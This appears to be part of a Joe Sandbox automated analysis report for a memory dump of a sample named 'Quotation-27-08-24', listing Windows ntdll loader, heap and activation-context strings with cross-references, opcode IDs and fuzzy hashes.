                                          • Loading import redirection DLL: '%wZ', xrefs: 00FD8170
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FD81E5
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 67c53bf3019ab5bc3b4b68da9f4a89a2667389ee29263137bfdc94a234acb07b
                                          • Instruction ID: b66adc755fc7a9950dffe3e2a76cf97fdd140967ea100822f3063f6ed697395e
                                          • Opcode Fuzzy Hash: 67c53bf3019ab5bc3b4b68da9f4a89a2667389ee29263137bfdc94a234acb07b
                                          • Instruction Fuzzy Hash: 0B31F7716443459BD324EF28DC46E1B7795FFC4B60F040568F884AB3D2DA28ED05E7A2
                                          Strings
                                          • RtlGetAssemblyStorageRoot, xrefs: 00FD2160, 00FD219A, 00FD21BA
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FD2180
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FD219F
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FD21BF
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FD2178
                                          • SXS: %s() passed the empty activation context, xrefs: 00FD2165
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: d80aad543ad5f0b01ef1a9146cc08bc595f08f8432eea0d49e8b122d556fc0e7
                                          • Instruction ID: 54ee6ab185872a6769adf7ee6e1a029a5702ed6d76c4e24846c9ee8333584a08
                                          • Opcode Fuzzy Hash: d80aad543ad5f0b01ef1a9146cc08bc595f08f8432eea0d49e8b122d556fc0e7
                                          • Instruction Fuzzy Hash: A031E532F4032477FB219A958C85F5E7A69DBA5B50F19406ABA04BB281D370DE00F6E2
                                          APIs
                                            • Part of subcall function 00FA2DF0: LdrInitializeThunk.NTDLL ref: 00FA2DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA0D74
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: 0478cde6aac8655f50641cf0adc2b84787adb6b6cd8416e5be20c4128d4ec362
                                          • Instruction ID: dfaaacc936b7a2b28423cccc474f9ac33783388cd85b346ba002f698242cbdcc
                                          • Opcode Fuzzy Hash: 0478cde6aac8655f50641cf0adc2b84787adb6b6cd8416e5be20c4128d4ec362
                                          • Instruction Fuzzy Hash: F1427EB2900715DFDB20CF64C881BAAB7F5FF05310F1445AAE949DB241DB74AA84EF61
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: de4e6a050f2067f0cf56bcb8f3a2e463550f0c827a7118994abcd943d7912628
                                          • Instruction ID: 4f40497d74a3907b2374893b6a5d895f66b91f13b678f973bdcace9619614b50
                                          • Opcode Fuzzy Hash: de4e6a050f2067f0cf56bcb8f3a2e463550f0c827a7118994abcd943d7912628
                                          • Instruction Fuzzy Hash: 23C166755083868FC711CF28C540B6AB7E4FF84714F04896AF896AB261E778CA49EF53
                                          Strings
                                          • @, xrefs: 00F98591
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F98421
                                          • LdrpInitializeProcess, xrefs: 00F98422
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F9855E
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 3ffcfbb878b652b1ed3c867af31f27cbaac45f91364a4ca2c4ceed03f8a62d63
                                          • Instruction ID: 70a612520a61db80f3603776ca4aa14da1716dcbfe6cb56a7afda2e6c04d88e4
                                          • Opcode Fuzzy Hash: 3ffcfbb878b652b1ed3c867af31f27cbaac45f91364a4ca2c4ceed03f8a62d63
                                          • Instruction Fuzzy Hash: B891BEB1508340AFEB21DF64CC41FABB7E8BF857A0F44492EF58492141E734D909AB62
                                          Strings
                                          • .Local, xrefs: 00F928D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FD22B6
                                          • SXS: %s() passed the empty activation context, xrefs: 00FD21DE
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FD21D9, 00FD22B1
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 57c904c25d582b0fc4960e6373f4afe080bec8e6672040fa2561c25cc034eca2
                                          • Instruction ID: 4d13b6e8b53a697bafb588b4c41119f8f895d6fd2757fec36935ecd447d141f2
                                          • Opcode Fuzzy Hash: 57c904c25d582b0fc4960e6373f4afe080bec8e6672040fa2561c25cc034eca2
                                          • Instruction Fuzzy Hash: F6A19131D00229ABEF65CF54DC84BA9B3B1BF58324F2541EAE808A7351D7309E80EF91
                                          Strings
                                          • RtlDeactivateActivationContext, xrefs: 00FD3425, 00FD3432, 00FD3451
                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FD3437
                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FD3456
                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FD342A
                                          Similarity
                                          • API ID:
                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                          • API String ID: 0-1245972979
                                          • Opcode ID: cee5160b126a9179515d92267800648f91a14a05b8f3a6ca078e96631b513a5b
                                          • Instruction ID: a7c23c04a003f42bebeb7786de791031282fe2136556e4828ec71ddf6053b000
                                          • Opcode Fuzzy Hash: cee5160b126a9179515d92267800648f91a14a05b8f3a6ca078e96631b513a5b
                                          • Instruction Fuzzy Hash: 98615B32A40B119FDB22CF18C841F2AB7A1EF91B60F18451AF9559B381D738FD01EB92
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FC106B
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FC0FE5
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FC10AE
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FC1028
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: b37abb13d03d7b2abbed1bf30a552f41e6356b442c9e7b0417092e380ce33432
                                          • Instruction ID: b5eafde329260e7048152e8f5ba27dbaa265584c69e78aacdc622c8929250049
                                          • Opcode Fuzzy Hash: b37abb13d03d7b2abbed1bf30a552f41e6356b442c9e7b0417092e380ce33432
                                          • Instruction Fuzzy Hash: D371CFB19043459FCB20DF14C886F9B7FA8AF85764F040468F9498B186D778D989EBD2
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FCA9A2
                                          • apphelp.dll, xrefs: 00F82462
                                          • LdrpDynamicShimModule, xrefs: 00FCA998
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FCA992
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: 11ee87239ff51c3436cbe34fc9a84605ad18df178392882b8d166569e7c2c88d
                                          • Instruction ID: 083bf3c1d4c2e13fd0bfcd87431c588693f2fa217dc5b30aab6bbe7c47a21913
                                          • Opcode Fuzzy Hash: 11ee87239ff51c3436cbe34fc9a84605ad18df178392882b8d166569e7c2c88d
                                          • Instruction Fuzzy Hash: DE313772A00306EBCB30AF599986F6BB7B4FB80718F25001DF840AB245C779AC81E791
                                          Strings
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F7327D
                                          • HEAP[%wZ]: , xrefs: 00F73255
                                          • HEAP: , xrefs: 00F73264
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 5ec0e0a5268afdd3458e23bc94ea3db712fd269dc1f667bed793b474c9b964e4
                                          • Instruction ID: 0180f6585960aba2cad07d43eebce09bf87c1ea4599fa22c6fddd25894ac9740
                                          • Opcode Fuzzy Hash: 5ec0e0a5268afdd3458e23bc94ea3db712fd269dc1f667bed793b474c9b964e4
                                          • Instruction Fuzzy Hash: 7992AD71E04249AFDB25CF68C440BADBBF1FF49310F14C05AE889AB351D739AA45EB51
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: ac13b4fbc41b5385e4a6a240ad006b383407433cb5a259e37af8431cfba78057
                                          • Instruction ID: cb3c91f128ed7f566885ae41a04544c5cfb14372b6f94245193d864d3a478054
                                          • Opcode Fuzzy Hash: ac13b4fbc41b5385e4a6a240ad006b383407433cb5a259e37af8431cfba78057
                                          • Instruction Fuzzy Hash: FBF1BB31A00606DFDB14CF68C985FAAB7B5FF44710F248169E44A9B381DB34ED81EB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          Strings
                                          • LdrpCheckModule, xrefs: 00FCA117
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FCA121
                                          • Failed to allocated memory for shimmed module list, xrefs: 00FCA10F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-161242083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F5CD34
                                          • InstallLanguageFallback, xrefs: 00F5CD7F
                                          • @, xrefs: 00F5CD63
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FD82E8
                                          • Failed to reallocate the system dirs string !, xrefs: 00FD82D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 00FD82DE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          Strings
                                          • PreferredUILanguages, xrefs: 0101C212
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0101C1C5
                                          • @, xrefs: 0101C1F1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FE4888
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00FE4899
                                          • LdrpCheckRedirection, xrefs: 00FE488F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FE2104
                                          • LdrpInitializationFailure, xrefs: 00FE20FA
                                          • Process initialization failed with status 0x%08lx, xrefs: 00FE20F3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          Strings
                                          • LdrResSearchResource Enter, xrefs: 00F6AA13
                                          • LdrResSearchResource Exit, xrefs: 00F6AA25
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          Strings
                                          • kLsE, xrefs: 00F60540
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F6063D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 00F6A2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 00F6A309
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 00FE895E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee57cc6788f2703b9c4798e973ca62549959e52485e1ad0de450699028b46721
                                          • Instruction ID: 7e671090f9c67ab6ab05ee1aef13256fadbbc59542749ce33d11422517a680b9
                                          • Opcode Fuzzy Hash: ee57cc6788f2703b9c4798e973ca62549959e52485e1ad0de450699028b46721
                                          • Instruction Fuzzy Hash: 6271D475A042429FC355DF28C880B6AB7E5FF84310F04C5AAE898CB352DB38DD46DB92
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fd1ceed77d23e576a6d17d37a47ccc7600dc208b15a911ea49b1c7f8834ac5e
                                          • Instruction ID: 6e383ab7d01cbbf73144f9a300a90798f68eebcf515f0a7398cce1ecce7dc6e3
                                          • Opcode Fuzzy Hash: 9fd1ceed77d23e576a6d17d37a47ccc7600dc208b15a911ea49b1c7f8834ac5e
                                          • Instruction Fuzzy Hash: 6B71F032600B09AFDB31EF18CC45F66B7A5EF44760F104828E256CB6B1DB79E944EB50
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                          • Instruction ID: 43e93b18ed9fb0cd29e6552318d3b87266481f3ddd559f8c386a0878ace95ccb
                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                          • Instruction Fuzzy Hash: D7718D71E00609AFCB10DFAACD85E9EBBB8FF48300F144469E505E7251DB78EA41DB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ef15aaa99674d54eb557e8eccadda0c441783b4c13eb4cceb4343a62af26271
                                          • Instruction ID: f1c9feab6ee3e29a1944d30aa201c534ad6589b354db740645d8df01ba7e4425
                                          • Opcode Fuzzy Hash: 9ef15aaa99674d54eb557e8eccadda0c441783b4c13eb4cceb4343a62af26271
                                          • Instruction Fuzzy Hash: 93819372A043168FDB24CF58D585BAE77B1FF88324F25422DD900AB291D7799D41EB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34052243d429fd4334b243ddfc5cca1c71cb91eed30cc61c8d80fe05e04f2208
                                          • Instruction ID: 9f4e138bf626f307757a97ef58d2e890b4d08dec86fdef2c0ae621cd4dde1db4
                                          • Opcode Fuzzy Hash: 34052243d429fd4334b243ddfc5cca1c71cb91eed30cc61c8d80fe05e04f2208
                                          • Instruction Fuzzy Hash: 1551E172605741EFD312DE68C844F5BB7E8EBC9750F00492ABA80DB114DB79ED04C7A2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
